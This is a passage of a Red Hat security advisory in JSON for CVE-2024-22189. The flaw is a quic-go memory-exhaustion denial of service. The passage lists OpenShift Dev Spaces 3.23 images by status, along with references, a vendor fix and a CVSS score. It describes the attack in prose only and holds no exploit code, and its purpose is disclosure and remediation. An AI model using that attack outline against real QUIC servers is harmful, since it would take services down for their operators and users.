            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2273513"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in quic-go. This issue may allow an attacker to trigger a denial of service by sending a large number of NEW_CONNECTION_ID frames that retire old connection IDs. The receiver is supposed to respond to each retirement frame with a RETIRE_CONNECTION_ID frame, but the attacker can prevent the receiver from sending out the vast majority of these RETIRE_CONNECTION_ID frames by selectively acknowledging received packets and collapsing the peers congestion window and by manipulating the peer\u0027s RTT estimate.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "quic-go: memory exhaustion attack against QUIC\u0027s connection ID mechanism",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64"
        ],
        "known_not_affected": [
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2024-22189"
        },
        {
          "category": "external",
          "summary": "RHBZ#2273513",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2273513"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2024-22189",
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-22189"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-22189",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22189"
        },
        {
          "category": "external",
          "summary": "https://github.com/quic-go/quic-go/commit/4a99b816ae3ab03ae5449d15aac45147c85ed47a",
          "url": "https://github.com/quic-go/quic-go/commit/4a99b816ae3ab03ae5449d15aac45147c85ed47a"
        },
        {
          "category": "external",
          "summary": "https://github.com/quic-go/quic-go/security/advisories/GHSA-c33x-xqrf-c478",
          "url": "https://github.com/quic-go/quic-go/security/advisories/GHSA-c33x-xqrf-c478"
        },
        {
          "category": "external",
          "summary": "https://seemann.io/posts/2024-03-19-exploiting-quics-connection-id-management",
          "url": "https://seemann.io/posts/2024-03-19-exploiting-quics-connection-id-management"
        }
      ],
      "release_date": "2024-04-04T00:00:00+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2025-09-15T16:27:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant to your system have been applied. For details on how to apply this update, refer to: https://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2025:15847"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
